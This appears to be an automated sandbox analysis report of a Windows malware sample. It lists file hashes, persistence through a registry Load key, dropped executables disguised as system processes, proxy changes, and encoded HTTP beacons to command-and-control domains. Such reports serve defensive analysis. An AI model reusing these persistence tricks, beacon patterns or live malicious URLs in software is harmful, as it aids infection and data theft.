Analysis Date: 2014-06-20 07:57:53
MD5: 56d5f6936adfb789d87d50ea7a923530
SHA1: 65125431e73ffd65db5023e6e59708c6d74f4e2d

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386
Section .text md5: 14124c2a730b7aa04fe2ff6d0279720d sha1: 9ee103cf4326fab4ab5c3e8c8d77376dd34a0fa9 size: 167424
Section .rdata md5: 3a83c347609f22f191bc73672bd6abd8 sha1: a373fcf619177abab3a9b15757fdfe0d8c8ada9f size: 2048
Section .data md5: acf761252658a67e13e8543e50e13b59 sha1: 73ec9333502716cc1bb1af89d251665e2bf33c87 size: 23040
Section .tls md5: 0a7fd4929249e7079e2d2b9b5631e127 sha1: 7fd3ab03679385455a1f85f0a80d490b6fef903d size: 512
Timestamp: 2005-09-22 05:38:59
Version: PrivateBuild: 1532
PEhash: 2507d56a6f03457bedc7da86ce879af2d1694548
IMPhash: 18ca8b9bec235db32dd9f7703beb6942

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex: {4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: 127.0.0.1
Winsock DNS: zonekg.com
Winsock DNS: psfk.com
Winsock DNS: elworldonline.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNS: psfk.com
Type: A
72.10.50.52
DNS: zonetf.com
Type: A
208.73.210.219
208.73.211.246
208.73.211.235
208.73.211.233
208.73.211.174
DNS: zonekg.com
Type: A
DNS: elworldonline.com
Type: A
HTTP GEThttp://psfk.com/img/icons/facebook.png?v92=47&tq=gKZEtzyszHCWAFcVgKcqlxDi0d1h2hQePd%2BvUqGH45o8I2oOZzqm%2BC%2Fb%2Bi%2F6FfYHZzl%2FQxCgAjfr4yUptH0s3wlX%2BFvhuLSVzYddh48ByQSr2BItGQkF6DdfcOtbcupREWOSvJcx2HnCsrriLUg4tDO6AEjy0RDC2zfliqJ50PG6A4lRkcQN63hwSw3tf6Iww44fikrfUxYbcvgB4wdMIp9J6aRUFyhjatDHX%2Fru%2F1FrnaB6xXv%2B%2BfLOgKawOA2kcZllqCxrbj00J%2FzE2btrGizGsI5Ijuu6eFJBB3kgRCO9pmcowC%2FZH6c5HbXlqCxuI6VkGktUKc6PxZktFVOSpuuwXNcNNFpHC%2BxVfS0Ps3hxIf0cecCdUISyFkvKy%2F7N0ZGc2JgagcrrW%2F07jfDDwOwH6p5kD4SIHV8CxRZ8PT%2FFEC
User-Agent: mozilla/2.0
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJsX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNw1Kv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNwFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJkX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJuX%2BSNxb5ygm1C4lKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1031 ➝ 72.10.50.52:80
Flows TCP: 192.168.1.1:1032 ➝ 208.73.210.219:80
Flows TCP: 192.168.1.1:1033 ➝ 208.73.211.174:80
Flows TCP: 192.168.1.1:1034 ➝ 208.73.211.174:80
Flows TCP: 192.168.1.1:1035 ➝ 208.73.211.174:80
Flows TCP: 192.168.1.1:1036 ➝ 208.73.211.174:80
Flows TCP: 192.168.1.1:1037 ➝ 208.73.211.174:80
Flows TCP: 192.168.1.1:1038 ➝ 208.73.211.174:80

Raw Pcap


Strings